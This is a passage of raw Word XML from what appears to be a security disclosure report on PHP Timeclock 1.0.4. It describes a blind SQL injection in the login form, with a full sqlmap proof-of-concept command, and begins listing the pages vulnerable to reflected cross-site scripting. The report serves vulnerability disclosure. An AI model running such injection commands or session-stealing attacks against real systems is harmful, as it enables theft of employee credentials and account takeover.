          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B392871" w14:textId="6842B354" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209073" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contact</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209073 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AE96905" w14:textId="3AD1632C" w:rsidR="00986D61" w:rsidRDefault="00986D61">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="634D8218" w14:textId="2F84B733" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="1174E943" w14:textId="4D2558A0" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="2CC5CF30" w14:textId="3BAA2ED8" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="0AD3D61C" w14:textId="7BC9A824" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="02446139" w14:textId="145269CD" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="38B1A9C1" w14:textId="12CA1826" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="6E0D24C5" w14:textId="094897E6" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="40F80F9F" w14:textId="077C2207" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="40322329" w14:textId="5E7BB3B5" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="4AAA2276" w14:textId="7BF8DE6F" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="157A32CD" w14:textId="0BFB9A4C" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="4E5B1573" w14:textId="1752AD54" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="59D02D1B" w14:textId="225F4A7D" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="3CB9638B" w14:textId="2F2CA5F0" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="5EE6A4E1" w14:textId="51502A86" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="0B7C27E8" w14:textId="35139EDD" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="4CC244DF" w14:textId="53D90EE1" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="491CAED8" w14:textId="6C6C7DE4" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="19268379" w14:textId="758E854E" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="779D050F" w14:textId="5DD7F6E0" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="4126D4E7" w14:textId="09C2807B" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="05C7AB01" w14:textId="6F0B95C7" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="2A7DDB85" w14:textId="395B4A45" w:rsidR="00107E1D" w:rsidRDefault="00107E1D" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="7E3D0172" w14:textId="1B9DDB97" w:rsidR="00107E1D" w:rsidRDefault="00107E1D" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="11FDEC2D" w14:textId="77777777" w:rsidR="005B5D57" w:rsidRDefault="005B5D57" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="6056F329" w14:textId="02BB6655" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="6A5176B6" w14:textId="524407EC" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="56C6E550" w14:textId="77777777" w:rsidR="00540374" w:rsidRDefault="00540374" w:rsidP="00D04326"/>
    <w:p w14:paraId="311A0F77" w14:textId="77777777" w:rsidR="000B6C5B" w:rsidRDefault="000B6C5B" w:rsidP="00D04326"/>
    <w:p w14:paraId="5E492312" w14:textId="2939C969" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc71189268"/>
      <w:bookmarkStart w:id="1" w:name="_Toc71209065"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA460D" w14:textId="03608A77" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="5587CEB1" w14:textId="630F3DF4" w:rsidR="00CA3D12" w:rsidRDefault="00B1733B" w:rsidP="00CA3D12">
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve"> May </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve">2021, </w:t>
      </w:r>
      <w:r w:rsidR="00163080">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">discovered several vulnerabilities in the </w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t>PHP Timeclock</w:t>
      </w:r>
      <w:r w:rsidR="004214EA">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve"> Time Management Software </w:t>
      </w:r>
      <w:r w:rsidR="00DE045F">
        <w:t xml:space="preserve">version 1.0.4 </w:t>
      </w:r>
      <w:r w:rsidR="0044273D">
        <w:t>includ</w:t>
      </w:r>
      <w:r w:rsidR="00AA6BE2">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve"> SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidR="00C010FC">
        <w:t xml:space="preserve"> and cross-site scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00CA3D12">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005811AE">
        <w:t>The risks posed by these vulnerabilities are severe and can lead to data compromise or as a foothold to further network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploitation</w:t>
      </w:r>
      <w:r w:rsidR="005811AE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000B35F4">
        <w:t>Specifically</w:t>
      </w:r>
      <w:r w:rsidR="0006608D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005811AE">
        <w:t xml:space="preserve">a motivated threat actor can exploit </w:t>
      </w:r>
      <w:r w:rsidR="0006608D">
        <w:t xml:space="preserve">the SQL injection vulnerability to enumerate your entire backend database, including employee information and passwords. This can be leveraged to gain administrator access to the </w:t>
      </w:r>
      <w:r w:rsidR="000B35F4">
        <w:t>application and</w:t>
      </w:r>
      <w:r w:rsidR="0006608D">
        <w:t xml:space="preserve"> might lead to compromise of the server. Furthermore, attackers can exploit the reflective XSS vulnerability to phish users and </w:t>
      </w:r>
      <w:r w:rsidR="00D80731">
        <w:t>steal</w:t>
      </w:r>
      <w:r w:rsidR="0006608D">
        <w:t xml:space="preserve"> their session cookies. By compromising these cookies, attackers can then impersonate users and administrators. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E1E3C" w14:textId="5CEAEA4B" w:rsidR="00761638" w:rsidRDefault="00761638" w:rsidP="00586D6B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2AE87B" w14:textId="6F25874E" w:rsidR="005809AB" w:rsidRDefault="005809AB" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="0DC4A643" w14:textId="3B600E8F" w:rsidR="005809AB" w:rsidRDefault="005809AB" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="6F1B571E" w14:textId="77777777" w:rsidR="00C30123" w:rsidRDefault="00C30123" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="7FFD72C7" w14:textId="392934A1" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="7CD4D389" w14:textId="5F68B23F" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="4E8AF7B9" w14:textId="444E5012" w:rsidR="00E864E9" w:rsidRDefault="00E864E9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="0B62908B" w14:textId="5AC8956D" w:rsidR="00E864E9" w:rsidRDefault="00E864E9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="5C1963FE" w14:textId="551DE89B" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="77715A45" w14:textId="2442C325" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="30453563" w14:textId="3E8AD65A" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="6F4E1787" w14:textId="5F9BF220" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="7CA4AC15" w14:textId="146DAE62" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="4EC7AECE" w14:textId="2799B3CB" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="4E934D09" w14:textId="2E4ECBBF" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="1FEB3B86" w14:textId="5A9E6DA7" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="0AE1904A" w14:textId="5C4768C7" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="3A8B9002" w14:textId="088B9BB2" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="6EE0C1B8" w14:textId="46043955" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="2B183E88" w14:textId="6CFF5281" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="1A0D16FA" w14:textId="09CBB2EE" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="669C0DEE" w14:textId="1015F383" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="352BA728" w14:textId="4815EDF1" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="0C561231" w14:textId="523D326B" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="10C41D33" w14:textId="2B8697C4" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="6578FE76" w14:textId="3C69FD7E" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="492EAE48" w14:textId="25FD8142" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="095492BA" w14:textId="77777777" w:rsidR="00B1733B" w:rsidRDefault="00B1733B" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="7E2B90B8" w14:textId="61EEC19D" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc71189269"/>
      <w:bookmarkStart w:id="3" w:name="_Toc71209067"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Identified Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F869CBF" w14:textId="1495C485" w:rsidR="00B152A9" w:rsidRDefault="00B152A9" w:rsidP="00B152A9"/>
    <w:p w14:paraId="50A0CE99" w14:textId="1BE413CD" w:rsidR="00B152A9" w:rsidRPr="00B152A9" w:rsidRDefault="00B152A9" w:rsidP="00B152A9">
      <w:r>
        <w:t>The following section details each vulnerability found, including a high-level overview, associated risks, and a proof of concept. The proof of concep</w:t>
      </w:r>
      <w:r w:rsidR="00D14755">
        <w:t xml:space="preserve">ts are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">examples scripts or command line arguments to tools which can proof </w:t>
      </w:r>
      <w:r w:rsidR="00510271">
        <w:t>exploitability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00BC3456">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D9E6F" w14:textId="62A09AF8" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="46660AB0" w14:textId="0537AE1C" w:rsidR="00DE045F" w:rsidRDefault="00066E00" w:rsidP="00DE045F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc71189270"/>
      <w:bookmarkStart w:id="5" w:name="_Toc71209068"/>
      <w:r>
        <w:t xml:space="preserve">Unauthenticated </w:t>
      </w:r>
      <w:r w:rsidR="00DE045F" w:rsidRPr="00DE045F">
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidR="009929E9">
        <w:t xml:space="preserve"> and Boolean Based Blind</w:t>
      </w:r>
      <w:r w:rsidR="00DE045F" w:rsidRPr="00DE045F">
        <w:t xml:space="preserve"> SQL Injection via login.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="39713396" w14:textId="46D4C8D3" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00DE045F"/>
    <w:p w14:paraId="6C291D7E" w14:textId="26B9C1FE" w:rsidR="00DE045F" w:rsidRDefault="00153C1A" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00153C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DE045F">
        <w:t>The PHP Timeclock application is vulnerable to a time-</w:t>
      </w:r>
      <w:r w:rsidR="0038033E">
        <w:t>based and</w:t>
      </w:r>
      <w:r w:rsidR="00A11700">
        <w:t xml:space="preserve"> boolean-based </w:t>
      </w:r>
      <w:r w:rsidR="00DE045F">
        <w:t>blind sql injection in the login_userid post body parameter</w:t>
      </w:r>
      <w:r w:rsidR="00673D3D">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00DE045F">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="009E0710">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DE045F">
        <w:t xml:space="preserve">login.php resource. </w:t>
      </w:r>
      <w:r w:rsidR="002912D5">
        <w:t>An attacker can exploit this vulnerability to dump the entire backend database, which includes employee and admin credentials among other information.</w:t>
      </w:r>
      <w:r w:rsidR="000D3782">
        <w:t xml:space="preserve"> Automated tools such as sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="000C3883">
        <w:t xml:space="preserve"> can assist in this process. Image 1 shows a sample PoC where sqlmap is used to dump the database name</w:t>
      </w:r>
      <w:r w:rsidR="00345603">
        <w:t xml:space="preserve"> as proof of exploitability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5338AEA1" w14:textId="40904B01" w:rsidR="00153C1A" w:rsidRDefault="00153C1A" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9A2A25" w14:textId="4300ABBD" w:rsidR="00153C1A" w:rsidRDefault="00153C1A" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00153C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00490BD6" w:rsidRPr="00490BD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers can </w:t>
      </w:r>
      <w:r w:rsidR="004D7A39">
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this vulnerability to enumerate the backend MySQL database, and create a dump of current </w:t>
      </w:r>
      <w:r w:rsidR="002F50BA">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="009B473B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A01AD1" w14:textId="5967A4DE" w:rsidR="00DD111C" w:rsidRDefault="00DD111C" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DD0D4A" w14:textId="5F1CE163" w:rsidR="004D7A39" w:rsidRDefault="00DD111C" w:rsidP="004D7A39">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD111C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004D7A39" w:rsidRPr="004D7A39">
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="001815A9" w:rsidRPr="0006255F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/login.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B3EFE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D7A39" w:rsidRPr="004D7A39">
        <w:t>--method POST --data "login_userid=user&amp;login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DCB6D" w14:textId="416CE6D4" w:rsidR="008C5723" w:rsidRDefault="008C5723" w:rsidP="00311BEB"/>
    <w:p w14:paraId="09E01FD2" w14:textId="0591F0B2" w:rsidR="005376D3" w:rsidRDefault="005376D3" w:rsidP="005376D3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE045F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE045F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DB3C7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping </w:t>
      </w:r>
      <w:r w:rsidR="00D539DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the Database Name with </w:t>
      </w:r>
      <w:r w:rsidR="001B7B74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65F450" w14:textId="6E0485F0" w:rsidR="008C5723" w:rsidRDefault="008C5723" w:rsidP="008C5723">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCD5871" w14:textId="77777777" w:rsidR="001B7B74" w:rsidRDefault="001B7B74" w:rsidP="001B7B74">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1D7DA7" wp14:editId="1E52C66C">
            <wp:extent cx="5943600" cy="29051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164F4B6C" w14:textId="3A774D74" w:rsidR="008C5723" w:rsidRDefault="001B7B74" w:rsidP="001B7B74">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Image 1: Shown above, the command line tool sqlmap is shown exploiting a time based sql injection in the test environment. The command uses the. –current-db option, which dumps the database name. Other options could dump all data in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520783F8" w14:textId="77777777" w:rsidR="008C5723" w:rsidRDefault="008C5723" w:rsidP="001815A9"/>
    <w:p w14:paraId="271D285A" w14:textId="367690FB" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc71189271"/>
      <w:bookmarkStart w:id="7" w:name="_Toc71209069"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Multiple </w:t>
      </w:r>
      <w:r w:rsidR="00F35E47">
        <w:t>Unauthenticated</w:t>
      </w:r>
      <w:r w:rsidR="00F8232F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Reflective Cross-Site Scripting Vulnerabilities via Get Request</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A24FF" w14:textId="253A314A" w:rsidR="008F7DB9" w:rsidRDefault="008F7DB9" w:rsidP="008F7DB9"/>
    <w:p w14:paraId="4481B7E1" w14:textId="53AD3312" w:rsidR="008F7DB9" w:rsidRDefault="00126D2B" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00126D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008F7DB9">
        <w:t xml:space="preserve">The PHP Timeclock application is vulnerable to reflective cross-site scripting via </w:t>
      </w:r>
      <w:r w:rsidR="004A086D">
        <w:t>GET Request</w:t>
      </w:r>
      <w:r w:rsidR="008F7DB9">
        <w:t xml:space="preserve">. By appending a backslash and a single quote to the get request URL, an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00727C1C">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="008F7DB9">
        <w:t xml:space="preserve"> insert a XSS payload to</w:t>
      </w:r>
      <w:r w:rsidR="00DC76FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F7DB9">
        <w:t xml:space="preserve">receive arbitrary JavaScript execution. In total, </w:t>
      </w:r>
      <w:r w:rsidR="00E27534">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008F7DB9">
        <w:t xml:space="preserve"> resources are vulnerable and are listed below.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2CB9">
        <w:t xml:space="preserve"> An attacker can exploit this vulnerability in </w:t>
      </w:r>
      <w:r w:rsidR="00C239EE">
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidR="00EB2CB9">
        <w:t xml:space="preserve"> campaigns to collect victim’s session tokens, which can then be used to log in to the application.</w:t>
      </w:r>
      <w:r w:rsidR="007673ED">
        <w:t xml:space="preserve"> Image </w:t>
      </w:r>
      <w:r w:rsidR="00BF7917">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007673ED">
        <w:t xml:space="preserve"> shows an example of exploiting the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00797C2A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4DCC16" w14:textId="599B207D" w:rsidR="00842157" w:rsidRDefault="00842157" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3A339A" w14:textId="53E9D07C" w:rsidR="00842157" w:rsidRDefault="00842157" w:rsidP="00DE045F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFF6CB" w14:textId="03FF8312" w:rsidR="00842157" w:rsidRDefault="00842157" w:rsidP="00DE045F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>/timeclock.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53EE07" w14:textId="2ED1F725" w:rsidR="00842157" w:rsidRDefault="00842157" w:rsidP="00DE045F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>/reports/audit.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74927B39" w14:textId="5F6B0986" w:rsidR="00DE045F" w:rsidRDefault="00842157" w:rsidP="00DE045F">
